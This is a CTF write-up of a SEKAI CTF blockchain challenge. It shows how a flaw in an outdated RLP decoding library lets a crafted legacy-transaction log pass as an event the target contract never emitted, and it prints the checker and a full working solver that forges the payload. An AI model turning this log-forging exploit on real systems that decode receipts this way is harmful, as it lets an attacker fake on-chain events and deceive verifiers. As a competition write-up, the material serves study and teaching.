0day in an outdated solidity log handler
Writeup
During SEKAI CTF, I encountered a very small blockchain challenge. I thought it would be a quick in-and-out experience, but it turned out to be a whole journey.
The source was small enough to give you false hope. We were given a contract that did nothing.
// SPDX-License-Identifier: MIT
// Fixed version to avoid foundry/4668
pragma solidity 0.8.27;
contract Cat {
event Purr();
function gibheadpats() public {
revert("*sniff sniff HISS HISS* hooman detected....");
emit Purr();
}
}
And we had to somehow produce logs in a block that basically said the contract above called emit Purr()
#!/usr/bin/env python3
from Crypto.Hash import keccak
from pyrlp import decode # https://github.com/SamuelHaidu/simple-rlp
from web3 import Web3
from ctf_launchers import PwnChallengeLauncher, current_challenge
from ctf_launchers.types import ChallengeContract
from ctf_server.types import LaunchAnvilInstanceArgs
k = keccak.new(digest_bits=256)
k.update(b'Purr()')
TARGET = k.digest()
class Launcher(PwnChallengeLauncher):
def get_anvil_instances(self) -> dict[str, LaunchAnvilInstanceArgs]:
# This challenge uses a "custom" foundry build:
# https://github.com/es3n1n/foundry/commit/21da3334659c2e54ea0680192daa0883935a473d
return {
'main': self.get_anvil_instance(
image='ghcr.io/es3n1n/foundry:latest',
extra_allowed_methods=['debug_getRawReceipts'],
),
}
def is_solved(
self,
web3: Web3,
contracts: list[ChallengeContract],
dynamic_fields: dict[str, str],
team: str,
) -> bool:
block_num = dynamic_fields.get('block', 'latest')
if not block_num.startswith('0x'):
block_num = f'0x{block_num}'
receipts = web3.provider.make_request(
'debug_getRawReceipts', # type: ignore[arg-type]
[block_num],
)
if 'error' in receipts:
return False
recs = receipts['result']
if not recs:
return False
try:
rec = bytes.fromhex(recs[0].replace('0x', ''))
_tx_type, rlp = rec[:1], rec[1:]
receipt = decode(rlp)
if receipt[0] != b'\x01':
return False
if len(receipt[2]) != 256:
return False
logs = [x for x in receipt[3] if int.from_bytes(x[0], 'big') == int(contracts[0]['address'], 16)]
if not logs:
return False
log = logs[0]
if log[2] != b'':
return False
if log[1] != [TARGET]:
return False
except Exception:
return False
return True
current_challenge.bind(Launcher(project_location='/challenge/project', dynamic_fields=['block']))
if __name__ == '__main__':
current_challenge.run()
In addition to this, we are told in the Python server source that a custom foundry (basically the blockchain’s source) is in use. After a quick look, we can see that it just adds an option to easily retrieve the logs, and that nothing can be exploited through this feature.
So what can we do?
After searching for much more than I want to admit on how to make the contract above emit that log, I came to the conclusion that it is impossible.
With this in mind, I checked the libraries, and the pyrlp
one looked pretty old at first glance (last commit 2 years ago), so I dug deeper.
What it does is essentially parse blockchain logs into actual objects, such as arrays and strings. Considering what it does, a thought comes to mind.
What if I can inject logs that say the contract called purr without it doing so?
As of the writing of this post, there are six types of logs we can emit:
- Legacy
- EIP1559
- EIP2930
- EIP4844
- EIP7702
- Deposit
Checking each of the logs, we can see that all of them start with a random byte, 0xf9
, and then comes some other data. That is all of them except Legacy
, which doesn’t contain that random byte at the beginning, starting directly with 0xf9
.
A quick check of the GitHub source reveals that the log reader doesn’t account for this case, which means we may be able to manipulate the data.
Right after the 0xf9
byte comes the length of the log, which we can manipulate. This means that by careful injection, we can satisfy these conditions
if receipt[0] != b'\x01':
return False
if len(receipt[2]) != 256:
return False
logs = [x for x in receipt[3] if int.from_bytes(x[0], 'big') == int(contracts[0]['address'], 16)]
if not logs:
return False
log = logs[0]
if log[2] != b'':
return False
if log[1] != [TARGET]:
return False
We can use those controlled-length bytes to forge a fake long string that skips all the data that we don’t control and jumps into our controlled data. From there, it was easy enough to forge the required logs.
Here is the full solver for the challenge for anyone interested. Left some comments where the forgery takes place for better understanding.
#!/usr/bin/env python3
from env import RPC, PRIV, CAT
from web3 import Web3
from eth_account import Account
from Crypto.Hash import keccak
from eth_account.signers.local import LocalAccount
from hexbytes import HexBytes
from solcx import compile_standard, install_solc
SRC = r"""// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
contract Purrer {
event Purr();
bytes32 constant TOPIC = keccak256("Purr()");
function emitPurr() external { emit Purr(); }
function emitPurrWithBytes(bytes calldata payload) external {
bytes32 t = TOPIC;
// Copy calldata -> memory, then log from memory (logs read memory only)
assembly {
let len := payload.length
let ptr := mload(0x40)
let newfree := and(add(add(ptr, len), 31), not(31))
mstore(0x40, newfree)
calldatacopy(ptr, payload.offset, len)
log1(ptr, len, t)
}
}
}
"""
def ensure_solc(v="0.8.24"):
try: install_solc(v)
except Exception: pass
def compile_src():
ensure_solc()
out = compile_standard(
{
"language": "Solidity",
"sources": {"Purrer.sol": {"content": SRC}},
"settings": {
"optimizer": {"enabled": True, "runs": 200},
"outputSelection": {"*": {"*": ["abi","evm.bytecode.object"]}},
},
},
solc_version="0.8.24",
)
c = out["contracts"]["Purrer.sol"]["Purrer"]
return c["abi"], c["evm"]["bytecode"]["object"]
def raw_tx_bytes(signed) -> bytes:
return getattr(signed, "rawTransaction", None) or getattr(signed, "raw_transaction", None)
def send_and_wait_legacy(w3: Web3, acct: LocalAccount, tx, *, nonce=None):
tx = dict(tx)
if nonce is None:
nonce = w3.eth.get_transaction_count(acct.address)
tx.setdefault("nonce", nonce)
tx.setdefault("gasPrice", w3.to_wei(2, "gwei")) # legacy fee field
tx.setdefault("chainId", w3.eth.chain_id)
signed = acct.sign_transaction(tx)
raw = raw_tx_bytes(signed)
if not raw:
raise RuntimeError("Couldn't extract raw tx bytes from SignedTransaction")
txh = w3.eth.send_raw_transaction(raw)
rcpt = w3.eth.wait_for_transaction_receipt(txh)
return txh.hex(), rcpt
def print_receipt_logs(rcpt):
print(f"status={rcpt.status} block={rcpt.blockNumber} gasUsed={rcpt.gasUsed}")
for i, lg in enumerate(rcpt.logs):
addr = lg["address"]
topics = [(t.hex() if isinstance(t, (bytes, bytearray, HexBytes)) else t) for t in lg["topics"]]
data_hex = lg["data"] if isinstance(lg["data"], str) else lg["data"].hex()
if data_hex.startswith("0x"):
data_len = len(bytes.fromhex(data_hex[2:]))
else:
data_len = len(bytes.fromhex(data_hex))
print(f" log[{i}].address={addr}")
print(f" log[{i}].topics[0]={topics[0] if topics else None}")
print(f" log[{i}].data_len={data_len}")
def main():
MODE = "bytes"
w3 = Web3(Web3.HTTPProvider(RPC, request_kwargs={"timeout": 300}))
if not w3.is_connected():
raise SystemExit("Cannot connect to RPC")
acct = Account.from_key(PRIV)
print("Sender:", acct.address)
print("Chain :", w3.eth.chain_id)
abi, bytecode = compile_src()
nonce0 = w3.eth.get_transaction_count(acct.address)
txh0, rcpt0 = send_and_wait_legacy(
w3, acct,
{
"from": acct.address,
"data": "0x" + bytecode,
"gas": 3_000_000,
"value": 0,
},
nonce=nonce0,
)
purrer = rcpt0.contractAddress
print("Deployed at:", purrer)
print("tx:", txh0)
contract = w3.eth.contract(address=purrer, abi=abi)
if MODE == "bytes":
addr_bytes = bytes.fromhex(str(CAT)[2:])
k = keccak.new(digest_bits=256)
k.update(b'Purr()')
TARGET = k.digest()
# Build your exact 100k bytes here.
# Example: first 1024 are 0x00..0xFF repeated; rest 0x13.
raw = b'\x00' * 665
raw += b'\x00' * 286
raw += b'\xb9\x01\x00'
raw += b'\x00' * 256
raw += b'\xf8'
#raw += b'\x07'
in_arr_payload = b''
in_arr_payload += b'\xf8'
#in_arr_payload += b'\x20'
in_arr_payload21 = b''
in_arr_payload21 += b'\xb8'
in_arr_payload21 += bytes([len(addr_bytes)])
in_arr_payload21 += addr_bytes
in_arr_payload22 = b''
in_arr_payload22 += b'\xf8'
in_arr_payload32 = b''
in_arr_payload32 += b'\xb8'
in_arr_payload32 += bytes([len(TARGET)])
in_arr_payload32 += TARGET
in_arr_payload22 += bytes([len(in_arr_payload32)])
in_arr_payload22 += in_arr_payload32
in_arr_payload23 = b'\x80'
#in_arr_payload21 += bytes([len(in_arr_payload22)])
in_arr_payload22 += in_arr_payload23
in_arr_payload21 += in_arr_payload22
in_arr_payload += bytes([len(in_arr_payload21)])
in_arr_payload += in_arr_payload21
raw += bytes([len(in_arr_payload)])
raw += in_arr_payload
ELEM = b'\x86' + b'\x13'*6 # 7 bytes
PER_CHUNK = 256
CHUNK_PAYLOAD = ELEM * PER_CHUNK # 256 * 7 = 1792 = 0x0700
CHUNK = b'\xf9\x07\x00' + CHUNK_PAYLOAD # list (len-of-len=2) len=0x0700
NUM_CHUNKS = (16128 // PER_CHUNK) - 1 # 63
top_payload = CHUNK * NUM_CHUNKS # each chunk is an RLP *element* of the top list
top_len = NUM_CHUNKS * (1792 + 3) # payload length of top list = 63 * (1792+3) = 113085 = 0x01B9BD
raw += b'\xfa\x01\xb9\xbd' + top_payload # top list header (len-of-len=3), len=0x01B9BD
raw += b'\x00\x00\x00'
print(len(raw))
print(raw)
built = contract.functions.emitPurrWithBytes(raw).build_transaction({
"from": acct.address,
"value": 0,
"nonce": nonce0 + 1,
"chainId": w3.eth.chain_id,
})
# Force legacy: strip 1559 fields just in case
built.pop("maxFeePerGas", None)
built.pop("maxPriorityFeePerGas", None)
# Gas: ~ 375 + 375 (1 topic) + 8*LEN + mem copy/expansion.
try:
g_est = w3.eth.estimate_gas({**built, "gasPrice": w3.to_wei(2, "gwei")})
built["gas"] = int(g_est * 12 // 10) # +20%
except Exception:
# Fallback upper bound if estimate balks
data_len = 0
if MODE == "bytes":
data_len = len(built["data"]) # ABI size, but not equal to log size; be generous
# we’ll just use a big constant
pass
elif MODE == "chunks":
data_len = 100_000
elif MODE == "prefix":
data_len = LEN
built["gas"] = 1_000_000 + 12 * max(data_len, 100_000)
txh1, rcpt1 = send_and_wait_legacy(w3, acct, built, nonce=nonce0 + 1)
print("tx:", txh1)
print_receipt_logs(rcpt1)
print("\nPurr() topic:", Web3.keccak(text="Purr()").hex())
if __name__ == "__main__":
main()